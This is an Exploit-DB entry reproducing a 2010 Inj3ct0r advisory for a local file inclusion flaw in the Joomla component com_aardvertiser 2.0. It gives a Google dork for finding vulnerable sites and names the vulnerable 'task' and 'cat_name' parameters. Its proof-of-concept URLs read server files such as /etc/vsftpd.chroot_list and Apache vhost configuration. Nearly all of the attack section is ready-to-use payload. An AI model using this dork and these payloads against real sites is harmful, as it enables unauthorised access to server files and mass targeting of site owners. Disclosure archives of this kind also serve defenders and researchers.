Joomla Component advertising (com_aardvertiser) 2.0 - Local File Inclusion Vulnerability



EDB-ID: 12592 CVE: N/A OSVDB-ID: N/A
Author: eidelweiss Published: 2010-05-13 Verified: Not Verified
Exploit Code:   Download Vulnerable App:    Download

Rating

(0.0)
Prev Home Next
========================================================================
Joomla Component advertising (com_aardvertiser) V2.0 Local File Inclusion Vulnerability
========================================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ########################################          1
0                    I'm eidelweiss member from Inj3ct0r Team          1
1                    ########################################          0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Download:	http://sourceforge.net/projects/aardvertiser/files/

Author:		eidelweiss
Contact:		eidelweiss[at]cyberservices.com
Thank`s:		r0073r & 0x1D (inj3ct0r) , JosS , exploit-db team , [D]eal [C]yber
Greetz: 		all inj3ctor Team, yogyacarderlink Team, devilzc0de & all INDONESIAN HACKER`s

========================================================================

-=[Descripttion]=-

A Joomla 1.5 component for advertising items in a 'classified ads' style on a Joomla site complete with extra modules and plugins for improved functionality. 


	-=[Dork]=-

	inurl:/index.php?option=com_aardvertiser

	-=[Exploit]=-

	http://localhost/index.php?option=com_aardvertiser&cat_name=conf&task= [lfi]
	http://localhost/index.php?option=com_aardvertiser&task= [lfi]

	-=[LFI]=-

	/etc/vsftpd.chroot_list
	/usr/local/etc/apache/vhosts.conf

	-=[ P0C ]=-

	http://localhost/index.php?option=com_aardvertiser&cat_name=conf&task=/usr/local/etc/apache/vhosts.conf
	http://localhost/index.php?option=com_aardvertiser&task=/etc/vsftpd.chroot_list

=========================| -=[ E0F ]=- |=================================